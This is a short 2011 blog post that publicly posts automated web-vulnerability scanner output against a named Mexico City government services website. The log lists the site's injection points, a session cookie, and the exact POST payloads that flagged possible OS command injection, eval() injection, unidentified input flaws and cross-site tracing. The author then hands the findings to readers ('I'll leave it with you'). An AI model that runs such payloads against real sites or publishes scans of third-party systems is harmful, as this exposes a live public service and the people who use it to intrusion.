Wednesday, June 8, 2011

Vulnerable www.tramitesyservicios.df.gob.mx/index.php

Greetings, Free World

[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.error500
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.lang
[Wed 08 Jun 2011 11:13:09 PM CDT] The page language is: es
[Wed 08 Jun 2011 11:13:11 PM CDT] The server header for the remote web server is: "Apache". This information was found in the request with id 15.
[Wed 08 Jun 2011 11:13:12 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.8". This information was found in the request with id 16.
[Wed 08 Jun 2011 11:13:17 PM CDT] Starting formAuthBrute plugin execution.
[Wed 08 Jun 2011 11:13:17 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 08 Jun 2011 11:13:17 PM CDT] Found 1 URLs and 6 different points of injection.
[Wed 08 Jun 2011 11:13:17 PM CDT] The list of URLs is:
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php
[Wed 08 Jun 2011 11:13:17 PM CDT] The list of fuzzable requests is:
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: GET
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll", voteid="109", voteid="110", voteid="111", voteid="112")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (task="search", option="com_search", searchword="buscar...")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="109", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="111", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="112", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:25 PM CDT] The web application sent a persistent cookie.
[Wed 08 Jun 2011 11:17:30 PM CDT] An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=d'kc"z'gj'"%2A%2A5%2A(((%3B-%2A%60)&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 248.
[Wed 08 Jun 2011 11:17:30 PM CDT] An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=&voteid=109&id=23". The modified parameter was "9f45efe675d5d419221a6e9c7a9f8716". This vulnerability was found in the request with id 264.
[Wed 08 Jun 2011 11:17:30 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.8". This information was found in the request with id 16.
[Wed 08 Jun 2011 11:17:30 PM CDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 18 and 19.
[Wed 08 Jun 2011 11:17:30 PM CDT] The URL: "http://www.tramitesyservicios.df.gob.mx/index.php" sent the cookie: "c97ff6ec87c98e0223c2d084cb9785c9=ncfl3sq0r86kqkfuu0smk83km3; path=/". This information was found in the request with id 1.
[Wed 08 Jun 2011 11:30:26 PM CDT] A possible OS Commanding was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=run+ping+-n+3+localhost&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task".Please review manually. This information was found in the request with id 1706.
[Wed 08 Jun 2011 11:37:27 PM CDT] eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=import+time%3Btime.sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=109&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2754.
[Wed 08 Jun 2011 11:46:23 PM CDT] The web server at "http://www.tramitesyservicios.df.gob.mx/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 3631.
[Thu 09 Jun 2011 12:00:37 AM CDT] Password profiling TOP 100:
[Thu 09 Jun 2011 12:00:37 AM CDT] The cookie: "c97ff6ec87c98e0223c2d084cb9785c9=ncfl3sq0r86kqkfuu0smk83km3; path=/" was sent by these URLs:
[Thu 09 Jun 2011 12:00:37 AM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php
[Thu 09 Jun 2011 12:00:37 AM CDT] Finished scanning process.

generic:generic:

Unidentified vulnerability
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=d'kc"z'gj'"%2A%2A5%2A(((%3B-%2A%60)&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 248.

Unidentified vulnerability
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 250.

Unidentified vulnerability
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=&voteid=109&id=23". The modified parameter was "9f45efe675d5d419221a6e9c7a9f8716". This vulnerability was found in the request with id 264.

osCommanding:osCommanding:Possible OS commanding vulnerability
A possible OS Commanding was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=run+ping+-n+3+localhost&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task".Please review manually. This information was found in the request with id 1706.

eval:eval:eval() input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=import+time%3Btime.sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=109&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2754.

eval() input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=import+time%3Btime.sleep(9)%3B&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "option". . Please review manually. This information was found in the request with id 2863.

eval() input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2865.

eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=112&id=Thread.Sleep(9000)%3B". The modified parameter was "id". . Please review manually. This information was found in the request with id 2926.

xst:xst:Cross site tracing vulnerability
The web server at "http://www.tramitesyservicios.df.gob.mx/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 3631.

403 - Access forbidden
You may not be able to visit this page because of:
  1. an out-of-date bookmark/favourite
  2. a search engine that has an out-of-date listing for this site
  3. a mistyped address
  4. you have no access to this page
  5. The requested resource was not found
  6. An error has occurred while processing your request.
Please try one of the following pages

If difficulties persist, please contact the administrator of this site
Access forbidden




I'll leave it with you.

Greetings, Free World.
